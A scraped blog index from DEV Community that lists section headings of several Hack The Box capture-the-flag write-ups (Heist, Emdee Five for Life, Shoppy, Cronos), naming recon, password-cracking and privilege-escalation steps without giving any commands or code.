Even though there are many other facets that make websites tick, these are the absolute basics that everyone in security should understand. This foundation is also critical for everyone who wants to break into bug bounty, which I will show in my next post.

DEV Community: SSHad0w

Hack The Box Writeup: Heist

Recon

/etc/hosts

Quick nmap

Full nmap scan

Port 80

Wappalyzer

/issues.php

/attachments/config.txt

Invalid creds

/errorpage.php

Cisco type 7 Password decryption

MD5 cracking with hashcat

Credential spraying with crackmapexec

Impacket-lookupsid

RPC Client

Crackmapexec winrm

Tool I found to bruteforce logins

Logging in with evil-winrm

User flag:

Privesc

Todo.txt

Inspecting /issues.php

/login.php

Dumping processes

Proc dump

Inspecting the dump file

Root

Hack The Box Writeup: Emdee Five for Life

Introduction

Methodology:

Identifying the template

Grabbing the response

Parsing the output

Grabbing specific output

Hashing the word

Sending the hash

Our flag... Or not?

Clocking our code

Why it didn't work:

Lessons learned

Hack The Box Writeup: Shoppy

Adding the domain to /etc/hosts

Recon

Nmap

Quick Nmap output

Full nmap

Port 9093

So what is Mattermost?

Mattermost Playbooks

Port 80

Login

NoSQL injection

/admin

Identifying the hashes

Mattermost

Gobuster

Mattermost.shoppy.htb

Authenticated Mattermost enumeration

Channels

Linux Privesc Enumeration

Transferring files with NC

Reverse engineering the file

Creating a carbon copy (optional)

Running the file command

Strings

Ghidra

Shell upgrade for deploy account

Deploy Enumeration

Linpeas

The group

Hack The Box Writeup: Cronos

Addding the domain to /etc/hosts

Recon

Nmap

Nmap scan

Port 80

Wappalyzer

Technologies

Adding the domain to `/etc/hosts`

Running the `file` command

Addding the domain to `/etc/hosts`

Checking for binaries with `sudo` privileges

Adding the ip to the `hosts` file

`/nav`

`/index.php`

`/accounts.php`

`/files.php`

`/status.php`

`Download.php`

`config.php`

`file_logs.php`